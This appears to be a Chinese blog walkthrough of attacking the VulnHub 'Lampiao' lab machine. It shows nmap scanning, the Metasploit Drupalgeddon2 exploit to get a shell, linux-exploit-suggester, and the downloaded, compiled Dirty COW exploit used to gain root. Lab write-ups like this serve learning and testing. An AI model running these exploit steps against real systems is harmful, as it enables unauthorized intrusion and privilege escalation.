- 1基于SpringBoot+Vue的在线公务员考试练习系统_公考在线题库网站 csdn
- 2解决gif图在小程序的webview长按转发不是动图的问题(安卓手机)_微信小程序中web-view的图片长按分享
- 3前端怎么实现聊天输入框?怎么实现类似b站评论的输入并发送自定义表情包?输入回显、发送时表情包转义为[emoji]字符串、页面展示回显_vue自定义表情如何显示到输入框
- 4探索Web3D世界:Three.js城市模型项目详解
- 5海量数据面试题----分而治之/hash映射 + hash统计 + 堆/快速/归并排序_hash分冶 统计词频 局部排序
- 6快速构建本地RAG聊天机器人:使用LangFlow和Ollama实现无代码开发_ragflow ollama
- 7【翻译】GPT-3架构,简述于“餐巾纸”上_gpt3 前馈网络 隐藏层维度
- 8【数据结构】C语言实现单链表万字详解(附完整运行代码)_c语言可运行代码
- 9通用大模型VS垂直大模型,两者的详细分析对比_通用大模型和垂直大模型
- 10数据结构——二叉树的非递归遍历_二叉树遍历的非递归实现
Linux脏牛漏洞提权_inux系统lampiao脏牛漏洞提权
赞
踩
通过vulnhub平台搭建靶场
靶机地址:Vulnerable By Design - Search: lampiao ~ VulnHub
靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip
下载完成后,双击Lampiao.ovf运行
启动靶机后,默认是不给用户名、密码和IP地址的
通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描
nmap扫描192.168.200.0/24
首先我们使用nmap的sP参数通过ping探测已存活的主机
nmap -sP 192.168.200.0/24
扫描192.168.200.152的端口
nmap -p1-65535 192.168.200.152
访问192.168.200.152:1898
启动msf,通过msf搜索所有关于Drupal的漏洞
使用exploit/unix/webapp/drupal_drupalgeddon2
show options查看所需参数
设置目标地址和目标端口
set rhost 192.168.200.152
set rport 1898
exploit进行攻击,并返回meterpreter会话
查看当前用户为www-data
上传漏洞收集脚本到目标主机赋予执行权限并执行
下载地址:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool
upload /home/kali/桌面/linux-exploit-suggester.sh /tmp/1.sh
进入目标主机的/tmp目录,查看上传的1.sh是否存在
赋予1.sh执行权限
chmod +x 1.sh 
运行1.sh,发现该靶机存在脏牛漏洞
上传漏洞收集脚本到目标主机赋予执行权限并执行
exp下载地址:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master
退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址
upload /home/kali/桌面/dcow.cpp /tmp/dcow.cpp
进入shell交互,编译exp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
开启py终端,运行./dcow,获取密码
python -c 'import pty; pty.spawn("/bin/bash")'
登录root用户,查看当前权限
用户名:root
密码:dirtyCowFun
